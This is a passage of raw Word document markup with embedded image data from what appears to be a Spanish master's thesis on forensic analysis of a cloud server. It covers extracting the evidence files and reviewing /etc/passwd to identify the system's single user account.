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&#10;moEI7irOgnBESJLVEmRZyFv+8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A4lARsAMAAFAIAAAOAAAAAAAAAAAAAAAAADoCAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;AAoAAAAAAAAAIQDJnGhgKEkAAChJAAAUAAAAAAAAAAAAAAAAABYGAABkcnMvbWVkaWEvaW1hZ2Ux&#10;LnBuZ1BLAQItABQABgAIAAAAIQD9VcHz3gAAAAcBAAAPAAAAAAAAAAAAAAAAAHBPAABkcnMvZG93&#10;bnJldi54bWxQSwECLQAUAAYACAAAACEAqiYOvrwAAAAhAQAAGQAAAAAAAAAAAAAAAAB7UAAAZHJz&#10;L19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAABuUQAAAAA=&#10;">
                <v:shape id="Imagen 113" o:spid="_x0000_s1182" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:41668;height:11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o9MyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8ApeRLMrVmU1iiiFXjyoLXh8JM/dxc3LkmR1++8bodDjMDPfMKtNbxtxJx9qxwrycQaC&#10;WDtTc6ng6/wxWoAIEdlg45gU/FCAzfr1ZYWFcQ8+0v0US5EgHApUUMXYFlIGXZHFMHYtcfKuzluM&#10;SfpSGo+PBLeNnGTZTFqsOS1U2NKuIn07dVaB2e++5XB4xK0/ZP3C6c5edKfU4K3fLkFE6uN/+K/9&#10;aRRM8nw6neezd3heSndArn8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAhuKPTMkAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:imagedata r:id="rId211" o:title="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1183" type="#_x0000_t202" style="position:absolute;left:42952;top:2339;width:15215;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rnHyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC/i0rrSjbpsjKGgXoZ1F2+P5q2pNi8lSbf67Y0g7Ph+/99qM9lenMiHzrGCfJaBIG6c&#10;7rhVcPh4vl+CCBFZY++YFPxQgM36+mqFlXZnfqdTHVuRQjhUqMDEOFRShsaQxTBzA3Hijs5bjOn0&#10;rdQezync9vIhy0ppsePUYHCgnaHmux6tgn3xuTd34/HpbVvM/eth3JVfba3U7c20fQQRaYoX8b/7&#10;Raf5Rblc5PNFXsLfTwkAuf4FAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAEU65x8kAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="61960E0C" w14:textId="2E1A4DFC" w:rsidR="00915A6C" w:rsidRPr="006D33DA" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>48</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="122" w:name="_Toc155782615"/>
                        <w:r w:rsidRPr="00DE063C">
                          <w:t>Descripción del sistema operativo.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="122"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, procederemos a extraer los archivos en adelante en </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>C:\TFM-estudio\</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y, mediante WSL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>WSL (Windows Subsystem for Linux): Capa de compatibilidad para ejecutar binarios de Linux de forma nativa en Windows.</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A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, procederemos a hacer las acciones necesarias para su análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EFD165" w14:textId="4DF0B548" w:rsidR="003B7B22" w:rsidRPr="00A703AB" w:rsidRDefault="003B7B22" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA5643F" w14:textId="5A3A0813" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00454796">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc155782517"/>
      <w:r w:rsidRPr="00A703AB">
        <w:t>4.3.</w:t>
      </w:r>
      <w:r w:rsidR="00454796">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:t>Usuarios del sistema.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="7A0390DC" w14:textId="77777777" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D94F2A" w14:textId="0EA34E26" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00454796" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>continuación,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vamos a </w:t>
      </w:r>
      <w:r w:rsidR="00FA774B" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>investigar</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> los usuarios que hay en el cloud server, para ello vamos a </w:t>
      </w:r>
      <w:r w:rsidR="004552FE" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>investigar</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el cd el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en el comprobaremos los usuarios del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A942475" w14:textId="15E47085" w:rsidR="00B20FD9" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizando los usuarios del sistema, el único usuario que realmente es el ya encontrado en la </w:t>
      </w:r>
      <w:r w:rsidR="00B9067B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el usuario Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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B20FD9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F393ED4" w14:textId="7C4E477D" w:rsidR="00A703AB" w:rsidRPr="00B20FD9" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ubuntu:x:1000:1000:Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de uso.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B20FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>:/home/ubuntu:/bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00B20FD9" w:rsidRPr="00B20FD9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA1F8AE" w14:textId="29F9B104" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="009A067C" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251797504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B7AAEB5" wp14:editId="3C00DF20">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>591</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5438064" cy="2232025"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1490010694" name="Grupo 50"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5438064" cy="2232025"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5438064" cy="2232025"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1952688391" name="Grupo 9"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5438064" cy="2232025"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5438064" cy="2232025"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="236665542" name="Imagen 75" descr="Interfaz de usuario gráfica, Tabla&#10;&#10;Descripción generada automáticamente"/>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10048"/>
                              <a:ext cx="3132455" cy="1797050"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1531507478" name="Imagen 76"/>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3150159" y="0"/>
                              <a:ext cx="2287905" cy="2232025"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1324444474" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="42530" y="1860697"/>
                            <a:ext cx="3069590" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="61CA34D9" w14:textId="758389F2" w:rsidR="00756E4A" w:rsidRPr="00C907A8" w:rsidRDefault="00756E4A" w:rsidP="00756E4A">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>49</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="124" w:name="_Toc155782616"/>
                              <w:r w:rsidRPr="00EA494C">
                                <w:t>Comprobación usuarios del sistema.</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7AAEB5" id="Grupo 50" o:spid="_x0000_s1184" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.05pt;width:428.2pt;height:175.75pt;z-index:251797504;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="54380,22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YATFAQAAJALAAAOAAAAZHJzL2Uyb0RvYy54bWzUVttu2zYYvh+wdyA0&#10;YFdrLMuWT4tTeMkSBAhaY8nQa5qiLKISyZGU7fRt+gx9hLzYPlKSncQtugW9SYDIP08/P37/8fTt&#10;rirJhhsrlJxH/ZM4IlwylQm5nkd/312+mUTEOiozWirJ59E9t9Hbs59/Ot3qGU9UocqMGwIl0s62&#10;eh4VzulZr2dZwStqT5TmEou5MhV1GJp1LzN0C+1V2UvieNTbKpNpoxi3FrMXzWJ0FvTnOWfufZ5b&#10;7kg5j4DNha8J35X/9s5O6WxtqC4Ea2HQF6CoqJC4dK/qgjpKaiOOVFWCGWVV7k6YqnoqzwXj4Q14&#10;TT9+9poro2od3rKebdd6TxOofcbTi9Wyd5sro2/10oCJrV6DizDyb9nlpvK/QEl2gbL7PWV85wjD&#10;ZDocTOLRMCIMa0kySOIkbUhlBZg/OseKP79zstdd3HsCZz9oYAL30hCRweemaTKaTAbTfkQkreBj&#10;V6bWikw9DH/q1TxRCzbDf2tmSEdm/n444JSrDY9aJdV/0lFR87HWb+CRmjqxEqVw9yG64HselNws&#10;BVuaZnBgPhmMRqM0HSYd8dcVXXNJxmlEMm4ZwuxaOm5y+gljUtuaGqHI2jx8htvT38gdXZX01192&#10;i9/D58KfEZqJhy+SQBE3NKOE1k5VD58dTlQc6rxZPSiPo0FFPWs3in20RKrzgso1X1iN0Idz+N29&#10;p9